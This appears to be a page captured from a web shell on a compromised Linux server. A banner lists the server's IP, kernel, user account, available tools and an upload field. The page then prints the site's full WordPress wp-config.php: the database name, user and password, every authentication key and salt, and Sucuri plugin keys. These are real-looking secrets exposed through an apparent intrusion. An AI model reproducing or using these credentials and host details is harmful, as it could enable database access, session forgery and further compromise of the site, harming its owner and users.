| Server IP : 167.99.254.82 / Your IP : 216.73.216.231 Web Server : Apache System : Linux host.techisquad.com 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64 User : pawluxera ( 1011) PHP Version : 8.1.34 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : ON Directory : /home/immo/public_html/ |
Upload File : |
<?php
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the installation.
* You don't have to use the website, you can copy this file to "wp-config.php"
* and fill in the values.
*
* This file contains the following configurations:
*
* * Database settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/
*
* @package WordPress
*/
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'immo' );
/** Database username */
define( 'DB_USER', 'immo' );
/** Database password */
define( 'DB_PASSWORD', 'kAMNgzqoEgKDfZm0o8LP9pRff' );
/** Database hostname */
define( 'DB_HOST', 'localhost' );
/** Database charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The database collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication unique keys and salts.
*
* Change these to different unique phrases! You can generate these using
* the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}.
*
* You can change these at any point in time to invalidate all existing cookies.
* This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '(3AV>(;1s8[U<lS&>w|mon/|W [N&8cw7}Ir<72~fn&RQvIEk_x)<uQ#i^E(UiY)' );
define( 'SECURE_AUTH_KEY', 'b3-~m&Qz4dzzn99%Tm1xmNZg_JZ+;[S]ok~>D)1UKeR,~<kP~(W]Q5;R4;GyY|Fc' );
define( 'LOGGED_IN_KEY', 'dg$U$-h_P-Xaokcu0c =XCD/_zu- QeLFr,T+>FBEr;tRe=6S}A|5;Vr>S0m+zWo' );
define( 'NONCE_KEY', 'xR@6zV79*5Rxje6gF(`er%-yl<TGAYt#INlRCUkeU{KQnR([,*}OogJ#}018UN5+' );
define( 'AUTH_SALT', 'U@xpbng0>t1<zq:TPm!GLS abx#3R:vH[-.2<>tRHD#eTYJf-7;@75$/`57m>[1B' );
define( 'SECURE_AUTH_SALT', 'oF77to<Fm7VFF*17-B+cPzOR1}JadM_a=upaCehgE]7tq?5;9Sku3Wq8Q/P]4u 1' );
define( 'LOGGED_IN_SALT', 'L%@?^Cs 1LXW+Hj:.<$+~VYUdDK?x|<gjkeQ3t6ME{qDXwl_#2R.M[kmcPr@{J>`' );
define( 'NONCE_SALT', 'GE;rs)3-/:;IhciNlw3RsGW!Q4(o!45Lu:GJaBJgbaK|=|Q6rO4wCLj#VbvJc^_p' );
/**#@-*/
/**
* WordPress database table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*
* At the installation time, database tables are created with the specified prefix.
* Changing this value after WordPress is installed will make your site think
* it has not been installed.
*
* @link https://developer.wordpress.org/advanced-administration/wordpress/wp-config/#table-prefix
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://developer.wordpress.org/advanced-administration/debug/debug-wordpress/
*/
define( 'WP_DEBUG', false );
/* Add any custom values between this line and the "stop editing" line. */
define('SUCURI_PLUG_KEY', '9878364c29fa21c0a0d85826e9664af608f67f8b2fa2748a6421caf02f32202c');
define('SUCURI_PLUG_SALT', '05aed8d4612a01ec6391cf01e2b25e362fd9936a0e49b9dc1db4eb9596658f15');
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';